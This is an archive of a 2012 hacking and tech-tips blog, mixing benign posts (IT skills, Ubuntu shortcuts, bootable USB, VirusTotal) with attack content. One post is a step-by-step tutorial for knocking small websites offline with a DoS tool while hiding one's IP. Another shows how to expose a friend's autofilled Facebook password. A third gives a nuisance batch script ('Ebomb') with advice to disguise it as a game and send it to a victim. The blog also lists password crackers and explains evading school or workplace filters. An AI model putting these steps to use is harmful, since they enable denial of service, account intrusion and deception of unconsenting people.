Thursday, August 2, 2012

11 things need to an it pro

Eleven Skills Every IT Pro Needs to Succeed Randy Muller, MCT, MCTS, MCSE, CEH, Global Knowledge Instructor July 2012 One of the interesting aspects of the IT industry is the continuous need to update current skills and learn entirely new ones. There are far too many skills for an IT Pro to even attempt to master, however . there are some skills that IT Pros who are serious about managing their career should know. The following list includes some of the key IT skills, and whilethere are 11 skills mentioned in this article, this list should not be considered as all- inclusive. Your own IT environment will determine the applicability, depending upon the size of the IT infrastructure and environment. 1. Virtualization and VDI There are numerous virtualization technologies available, including Microsoft Hyper-V, VMware vSphere, Citrix XenServer, and Oracle VM VirtualBox that can be used to reduce the physical number of servers required by a company. Virtualization has been adopted by companies of all sizes as a means to reduce costs through the consolidation of physical servers and lower overall cooling and electrical usage. Application Virtualization has become very popular with businesses. Having the skill set to deploy applications that connect securely through a browser is critical for companies with numerous offices and remote users. Virtual Desktop Infrastructure is another facet of the virtualized environment. Using VDI, a virtualized desktop is stored on a remote server and when clients work on their "local" system, the applications, data, processes, and programs are kept and run on a central server. This enables a local system with older hardware to run more advanced operating systems and applications than would normally be the case with their current systems. This also means that you might be able to use non-traditional platforms, such as a tablet, to run these applications, in addition to their traditional systems. Virtualization can aid in near real-time response to network conditions by providing for more disaster recovery capabilities. Another use for virtualization is for improved instruction for IT education and elsewhere, since there is no longer a need to have large numbers of computers for classrooms. 2. Cloud "To the Cloud" - that seems to be the current mantra in the business world. The cloud can compose one of several business models including: SaaS (Software as a Service), where a single application is available through a browser IaaS (Infrastructure as a Service), the most basic model, where you may "rent" servers or VMs PaaS (Platform as a Service), where an entire computing environment is available The cloud represents the next phase of computing (with VDI as part of this environment). Microsoft has invested heavily in the cloud (Azure and the new System Center 2012) as well as Amazon, HP, and IBM. Knowing how to leverage and configure clients for cloud computing will be an invaluable skill for IT professionals. 3. Interoperability (Networking) Interoperability is the key here. There are a few medium and larger IT departments with only a single platform type or a single manufacturer of networking equipment; these are the exceptions, and they are rare. In a typical IT environment, we tend to work in a highly connected world of disparate platforms, communications modalities (BYOD - bring your own device comes to mind), and operating systems. As an IT Pro, you should understand how these devices and platforms communicate and what communication protocols are used in this process. This also includes connecting and securing wireless networks, as well as the use of open source programs and operating systems. 4. Database Administration and Business Intelligence Access to information is critical in today's global environment. Corporations are even more dependent on a quick and reliable means to process and retrieve information. This means they must operate their own servers or have access to databases and business intelligence software to access this information in order to grow and become more successful. Regulatory compliance has had a huge impact on database management and data retention. Corporations are required to retain financial information, emails, and other communications for a number of years. Storage space and solutions have become much cheaper, so there is more emphasis on data retention. Having the ability to create and extract information from one of these databases is critical. Many of Microsoft's platforms require access to a SQL server, such as Lync Server and SharePoint. This means that IT Pros should be able to administer and maintain these servers, but do not need to become database administrators themselves (though it certainly wouldn't hurt). 5. Wireless In our highly connected world, we expect to be able to connect wirelessly from almost any device, from practically anywhere at any time, with seamless transition. Wireless experts who can install, configure, and maintain secure wireless networks are in high demand, with the emphasis on "secure." Implementing a secure wireless environment also means being able to plan and troubleshoot for growth and interferences (as well as possible compromise). Anyone managing wireless environments must be able to handle the calls that come in from remote users who are having problems with their wireless equipment running on different operating systems 6. Disaster Recovery Disaster planning and recovery is as much a methodology as it is a skill set. IT Pros must be able plan, test, and implement a disaster recovery (DR) plan. The planning part seems be done more frequently than the testing of the actual plans. Having a DR plan is critical for the survivability of a data center or network, but testing a disaster recovery plan is one of the most difficult tasks to schedule. There is rarely enough time (or budgetary resources) available to perform the critical tasks that need to get done in a network without adding a yearly or semi-yearly test of the DR plan. An integral part of the disaster recovery process is implementing fault-tolerant systems and providing for redundancy in your network. 7. Security Network and computer security concerns and requirements have dramatically increased. Security professionals are in high demand and this will only multiply in the coming years. As an IT Pro, you must have a good understanding of both physical and electronic security.Some of the most difficult tasks with IT security involve educating users and implementing effective security measures. There is a lot of information that can be gleaned through social media sites and social engineering that most companies would rather not have divulged. Training users (and IT staff) to be aware of these vulnerabilities is extremely difficult. IT Pros must always be aware of security issues and understand the vulnerabilities within their networks (from operating systems, servers down to the cable closet). This does not mean that every IT Pro must be able to perform a penetration test against his or her own network, but they must understand and prevent attacks against their network and prevent disclosure of confidential information. 8. Imaging Pick your imaging software/platform of choice as imaging will continue to be a valuable skill for some time (despite the rise of virtualization). Systems imaging is a critical skill as companies are shifting to standardized desktops and deployments. Part of this is done to deploy a consistent and secure platform as well as to provide ease of management. There are many imaging programs available, as well as Microsoft's Windows Deployment Services and imaging utilities. 9. Helpdesk or People Skills Knowing how to interact with non-technical people is a critical skill. This interaction must be based on the ability to effectively communicate, in words and language that the client can understand. A companies' help desk tends to be the "face" that most users will have with the IT department, and this should be a positive experience. IT Pros are very good at their jobs, but sometimes (and I know that this will come as a shock to everyone) they are not skilled in relating to their non-tech colleagues. Users just want their computers fixed or their data recovered and are not concerned with the processes behind our actions. IT Pros should have some experience working at the Help Desk. 10. The Noble Art and Science of Troubleshooting There are some IT skills that simply do not lend themselves to a short description, and troubleshooting is definitely one that falls into this category. Is troubleshooting a skill, an art, or is it both? If you ask any seasoned IT professionals, they will tell you that having troubleshooting knowledge is important, but not as important as knowing how to troubleshoot. This is one IT skill that cannot be easily taught (some might even say that you are born with the skill).The problem with troubleshooting is that it is a unique skill set that corporations are continuously seeking but simply do not have the time or money to invest in training. If you are talented at troubleshooting a specific program or system, then you become the "go-to" person - a valuable skill and commodity for your company. One would think that there would be more emphasis on teaching and sharing even the basics of troubleshooting, but sadly, this is not always the case. 11. PowerShell (and other scripting) Knowing how to use PowerShell (or other scripting technologies) to automate many common administrative tasks not only saves time that can be used on other (perhaps more critical) administrative tasks, but may increase your value to your employer as well. Knowing PowerShell or scripting is an important skill in today's IT environments. This does not mean that you must become a programmer in order to become a successful network engineer, but you must master the ability to create and run scripts to automate some administrative tasks. Most of Microsoft's newer technologies, including Exchange, SharePoint, SQL,and Lync have some administrative functions that can ONLY be implemented with PowerShell. The range of IT skills can be a tricky thing to quantify and qualify. What is useful in one environment may not be so in another. This article lists some of the most common skills that an IT Pro should know. If you don't know some of these areas, now is the time to learn them. One thing to keep in mind is that you are your own best career manager! You are the only one who can determine which career path to take.

Monday, July 23, 2012

hackers underground book


The Hacker’s Underground Handbook The Hacker’s Underground Handbook Learn What it Takes to Crack Even the Most Secure Systems By: David Melnichuk The Hacker’s Underground Handbook will guide you through password hacking, windows hacking, malware, phising, web hacking, network hacking and Linux (intro, installation, etc). All this material fully packed with images, thus being a top step-by-step guide, on the course of which you cannot fail. A great starting book which will guide you in the right direction, helping you understand the basic concepts of computer security and matters that you should take in consideration. Download Here:

Monday, July 16, 2012

How to burn ISO to USB - make bootable USB


Many times we face a problem when our cd/dvd do not work and we have to use bootable USB drive for system formatting. For this you can use ISO to USB. You can guess about its working by its name. This free utility works on windows XP, Vista and 7. Once you hahve downloaded this utility, the use of this tool is simple. Attach the USB on the system and browse the iso image you want to burn. If its bootable Windows ISO file then you can make bootable USB drive by checking Bootable option. Click on burn button to start the ISO file burning process. Download this tool here: http://www.isotousb.com/

How to burn ISO to USB - make bootable USB


Sunday, June 17, 2012

Portable desktop search tool for USB drives


You have a portable hard drive and you carry it with you where ever you go. But finding a file it on a system can cause you a problem because you can not search it from the windows search tool. because it is not indexed yet. In that case, suppose you have 500 GB external hard drive and you do not know how to search for a file in inside the hard drive. You can not wait for windows to index files for searching. In this case i have a better solution.
There is a search utility for this tyoe of problems named DropOut. It is a portanle application that makes it easier to search your USB. This is a windows tool and you only need to copy this dropout.exe in your USB disk's root.
Now you can search the whole disk with it anytime anywhere.
It creates it's own index at first run inside the USB and search index updates itself whenever you run Dropout next so your new / updated files are automatically included.


Features:


  1. Super fast searching <1sec
  2. Totally portable
  3. Search multiple directories
  4. Exclude files
  5. Incremental indexing of files
  6. Background indexing allows you to search during indexing
  7. Indexing ALL text files
  8. Search history via auto complete
  9. Sorting of result list
  10. Only .NET 2.0 required
  11. Single exe created using IL-Merge
  12. Configurable via ini file (not required)
  13. Open the file from the interface
  14. Open the containing directory from the interface

Thursday, May 31, 2012

Password Protect Bookmarks in Google Chrome

Want to protect your bookmarks from unauthorized access?? There is an easy way. Secure Bookmarks is a nice Google Chrome extension which allows users to add a password protection to their bookmark list. This is really a nice idea, if you share your computer with others. With the use of this extension, you can protect your favorite links from others.

After installing this extension to your Google Chrome web browser, You will see a star icon near the address bar. Clicking on this icon first time will take you to a new page which asks the password. Now you are ready to secure your bookmark list.

Whenever you want to save any link as bookmark, simple click at the star icon of the extension and then click on "create new bookmark" button. Save as many links as you can. To change the position on the list, you can simply drag the bookmark link to the new place.

You'll find three more icons in the top right corner of Secure Bookmarks.
  • First icon is to delete all bookmarks. You will be asked for confirmation if you press this button.
  • Second icon is to visit the Secure Bookmarks settings page.
  • Third icon is to Sign off to end your Secure Bookmarks session.

When you are done and going to close your browser or giving your system to someone else, click on sign off button.

Next time when you will try to access your bookmarks, it will ask for the password. Enter the password to access your bookmarks again.

NOTE: This extension does not allow any type of password recovery. In case you forget your password, you will have to reset the extension. And you will lose your saved links.

If you want to enjoy this extension in incognito mode, go to Tools >> Extensions (or type chrome://settings/extensions in the address bar) and expand the Secure Bookmarks entry. Tick the 'Allow in incognito' checkbox.

Set permanent delete on delete key

DEL key is used for delete and file and send it to the recycle bin in windows. Recycle is used to recover those files which have been deleted accidently. But most of the people do not use only delete button to delete files. They use shift+ del to delete the file permanent. For those people, it is better to set permanent delete on DEL key. Thus they do not need to press shift+ del key to delete a file permanently.


Follow these steps:


  • Click on start and then run.
  • Type gpedit.msc in the box and press enter. It will open a group policy window. 
  • Navigate to the User Configuration - >Administrative Templates
  •   >Windows Components>Windows Explorer
  • In the right side settings menu double click--Donot move deleted file to Recycle bin.
  • >click OK.

Now you have done. Delete the file anytime and it will not go to the recycle bin

Keyboard Shortcut for UBUNTO



UBUNTU is one of the popular operating system based on LINUX. It has a good number of users after fedora. I have already posted keyboard shortcuts for different web browsers and operating system. Today i am posting keyboard shortcuts for UBUNTU which will help you to work faster


Ctrl + A = Select all 
Ctrl + C = Copy the highlighted content to clipboard 
Ctrl + V = Paste the clipboard content 
Ctrl + N = New (Create a new document, not in terminal) 
Ctrl + O = Open a document 
Ctrl + S = Save the current document 
Ctrl + P = Print the current document 
Ctrl + W = Close the close document 
Ctrl + Q = Quit the current applicationKeyboard shortcuts for GNOME desktopCtrl + Alt + F1 = Switch to the first virtual terminal 
Ctrl + Alt + F2(F3)(F4)(F5)(F6) = Select the different virtual terminals 
Ctrl + Alt + F7 = Restore back to the current terminal session with X 
Ctrl + Alt + Backspace = Restart GNOME 
Alt + Tab = Switch between open programs 
Ctrl + Alt + L = Lock the screen. 
Alt + F1 = opens the Applications menu 
Alt + F2 = opens the Run Application dialog box
Alt + F3 = opens the Deskbar Applet 
Alt + F4 = closes the current window. 
Alt + F5 = unmaximizes the current window 
Alt + F7 = move the current window 
Alt + F8 = resizes the current window. 
Alt + F9 = minimizes the current window. 
Alt + F10 = maximizes the current window 
Alt + Space = opens the window menu
Ctrl + Alt + + = Switch to next X resolution 
Ctrl + Alt + - = Switch to previous X resolution 
Ctrl + Alt + Left/Right = move to the next/previous workspaceKeyboard shortcuts for TerminalCtrl + A = Move cursor to beginning of line 
Ctrl + E = Move cursor to end of line 
Ctrl + C = kills the current process. 
Ctrl + Z = sends the current process to the background. 
Ctrl + D = logs you out. 
Ctrl + R = finds the last command matching the entered letters. 
Enter a letter, followed by Tab + Tab = lists the available commands beginning with those letters. 
Ctrl + U = deletes the current line. 
Ctrl + K = deletes the command from the cursor right. 
Ctrl + W = deletes the word before the cursor. 
Ctrl + L = clears the terminal output 
Shift + Ctrl + C = copy the highlighted command to the clipboard. 
Shift + Ctrl + V (or Shift + Insert) = pastes the contents of the clipboard. 
Alt + F = moves forward one word. 
Alt + B = moves backward one word 
Arrow Up/Down = browse command history 
Shift + PageUp / PageDown = Scroll terminal outputKeyboard shortcuts for CompizAlt + Tab = switch between open windows 
Win + Tab = switch between open windows with Shift Switcher or Ring Switcher effect 
Win + E = Expo, show all workspace 
Ctrl + Alt + Down = Film Effect 
Ctrl + Alt + Left mouse button = Rotate Desktop Cube 
Alt + Shift + Up = Scale Windows 
Ctrl + Alt + D = Show Desktop 
Win + Left mouse button = take screenshot on selected area 
Win + Mousewheel = Zoom In/Out 
Alt + Mousewheel = Transparent Window 
Alt + F8 = Resize Window 
Alt + F7 = Move Window 
Win + P = Add Helper 
F9 = show widget layer 
Shift + F9 = show water effects 
Win + Shift + Left mouse button = Fire Effects 
Win + Shift + C = Clear Fire Effects 
Win + Left mouse button = Annotate: Draw 
Win + 1 = Start annotation 
Win + 3 = End annotation 
Win + S = selects windows for grouping 
Win + T = Group Windows together 
Win + U = Ungroup Windows 
Win + Left/Right = Flip WindowsKeyboard shortcut for NautilusShift + Ctrl + N = Create New Folder 
Ctrl + T = Delete selected file(s) to trash 
Alt + ENTER = Show File/Folder Properties 
Ctrl + 1 = Toggle View As Icons 
Ctrl + 2 = Toggle View As List 
Shift + Right = Open Directory (Only in List View) 
Shift + Left = Close Directory (Only in List View) 
Ctrl + S = Select Pattern 
F2 = Rename File 
Ctrl + A = Select all files and folders 
Ctrl + W = Close Window 
Ctrl + Shift + W = Close All Nautilus Windows 
Ctrl + R = Reload Nautilus Window 
Alt + Up = Open parent directory 
Alt + Left = Back 
Alt + Right = Forward 
Alt + Home = go to Home folder 
Ctrl + L = go to location bar 
F9 = Show sidepane 
Ctrl + H = Show Hidden Files 
Ctrl + + = Zoom In 
Ctrl + - = Zoom Out

Top Password Cracking Tools

In this post i am going to write about various password cracking tools. These password cracking tools includes, network password cracking, windows password cracking, ftp, http, telnet, IMAP, rlogin, SSH and various other protocol password cracking tools.


These are some popular password cracking tools:


Cain and Abel: This is a free password cracking tool for windows systems. It allows users to recover various kind of passwords. This password cracking tool recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and crypt-analysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.


John the Ripper: John the Ripper is a fast password crcking tool available for UNIX/Linux and Mac OS X platforms. This is not a free tool but there is a free trail version available to download.


Ophcrack: Ophcrack is a best windows password crcking tool. It is a rainbow-table based windows password cracker.  Features of this cracking tool includes LM and NTLM hash cracking, a GUI, the ability to load hashes from encrypted SAM recovered from a Windows partition, and a Live CD version. 


THC Hydra: THC Hydra is a a remote password cracking tool. It supports various network protocols including telnet, ftp, http, https, smb, several databases, and much more.


Brutus: This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NNTP, and more. 


Medusa: Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.


Aircrack: Aircrack is a famous wireless network password cracking tool. This is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

How to crash small websites using RDOS | DOS tutorial

DOS TUTORIAL 
How to crash small websites using RDOS


Have you ever wanted to DOS attack on a website. Here I am going to write about a tool which is really helpful but it wouldn't be effective on big servers. 


NOTE: Please do not try to this tutorial to harm any other's website. I will not be responsible in any case. If you are not agree, please leave this website without reading further tutorial



for cool computer tricks click here
You need:

  1. Port Scanner Download Here
  2. rDOS Download Here
  3. Ip Hiding tool Download Here

Follow these steps:

1: First of all you need to know the IP address of the website you want to crash.
Use ping command in windows to get the ip address of the website.
open CMD and enter ping www.website.com
see the snap
Now you have the IP address of the website.

2: Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack :P
otherwise you can crash this website.

3: Now open your  rDos. Enter your victims ip that you got from step 1.
It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work

Wednesday, May 30, 2012

Monitor goes out of frequency and does not display anything

Problem:
Monitors have a limit of maximum supported frequency (Refresh rate) for each resolution setting at which display is refreshed. When you set a high resolution with a high frequency that is not supported by the monitor, it displays a message Frequency out of range. Within a few seconds of setting the frequency if you press Esc key it will revert back to the previous resolution.
But what if when you are stuck with the same Frequency out of range and your monitor does not display anything.
Don’t worry, we have the solution if your monitor doesn’t display anything

Solution:
1. Boot in VGA mode by keep pressing F8 key during boot-up.
2. Un-install the display driver
3. Set the display settings to some supported value
4. Restart, install display (video) driver and set the appropriate settings which your monitor supports.
5. Restart again and it is Fixed.
Tip: Most of old monitors don’t support 1024×768 at a refresh rate greater than 60Hz, so avoid setting this resolution at a frequency higher than 60 Hz if your monitor is an old CRT monitor.

How to check for safe file before downloading


On the Internet we download many files a day. Some of these are safe but some are infected by virus or other malicious programs. Although we use Antivirus programs to protect our system, but it will be much better to scan a file before downloading on your system. If the download source is unknown or new, then you must check.


VIrusTotal is an online security website which can help you in this. This website scan download links Worth more than 40 different security tools to check whether the file is safe to download or infected.
To scan for a file, right click on the download link and select Copy link address.
Now open new tab in browser and write Virustotal.com and press enter. In the new website, paste the link in the text field and click Submit URL. VirusTotal will send the link to its engine which will check the link against several URL analysis tools to see if the site is black listed as a malicious site already. 
After few seconds, it will show you the scan result. If nothing is detected in the scan, you can proceed with the downloading.




Integrating it with FireFox: This security tool is also available as add-on for the FireFox which is called VTZilla. So you do not need to go to the website each time you want to check a link. After installing this tool in your FireFox, you will see a new toolbar from which you can see the status of the website. It also add an option in the right click menu. just right on the link you want to scan and you will find an option " select Scan with VirusTotal." This option will open the scan results in the new tab for the selected URL.


Although the security tool use more than 40 scanners to check the website but you can not blindly trust on it. There may be the new threat on the link which is not listed in all the scanners. So you should use a good antivirus and Internet security solution on your system.


If you are Google Chrome user, you do not need to go for this tool. Just update your web browser. Latest version of Google Chrome has this security service in-built which notifies user when they try to download files from malicious sources.

How to Access Blocked Websites with Opera Portable

Many times at schools and other workplaces websites like Facebook, YouTube and many other social networking sites are blocked which you might love to browse, in that case we have many alternate options the one going for the use of proxies but well we have another portable idea of browsing those blocked websites using the opera portable edition which works quit well.
opera turbo mode
Using Opera Portable on a flash drive (so that you can carry it around), run it on a computer at your workplace and then turn on Opera Turbo, your browser will send the request to the Opera servers, which will act as anonymous proxies for you. The network will not be blocking the Opera servers from communicating with you, and you will be able to browse the websites safely.
So now any blocked website like social networking or other ones can be browsed safely and anonymously without any problems and that too with your simple portable solution.

So download Opera Portable Edition now, and start browsing anonymously.

Monday, May 21, 2012

How to reveal a Facebook password

Today i will be showing you how to reveal your friends facebook password, But before we continue let me tell you its not really hacking its just code manipulation.


  • Many times we have seen our friends leaving there system without closing web browser this leads to temp auto filling of data inside the data fields  even if you haven’t saved any of it. To be clear have a glance on below image.


 
  • Now the data inside the username and password field is temporarily save, data will disappear as soon as web browser is closed.
  • Now this is where our data modification part starts.
  • Now a day every browser is integrated with Inspect Element component.
  • Right Click in password box and select Inspect Element from menu as shown below.
 
 
  • Now the tricky work begins.
  • There will be many options shown at the bottom of the page select HTML, and your browser should look similar to below image.

 
  • After you have selected HTML version/option you will be able to see page code looking similar to HTML tags, similar to below image.

  • Now Double Click on “Password” and you will be able to edit it.
  • Change “Password” to “text“, and your browser will look similar to below one.
 

  •  Done
  • Check your password box
  • Vola we did it !

Sunday, February 26, 2012

Ebomb a virus for fun



Ebomb a virus for fun

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox


and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)


you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "
www.ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D

(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "
ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad


and then simply save it as "anyname.bat"

Note : The only way to get out of any ebomb attack is simply by System restart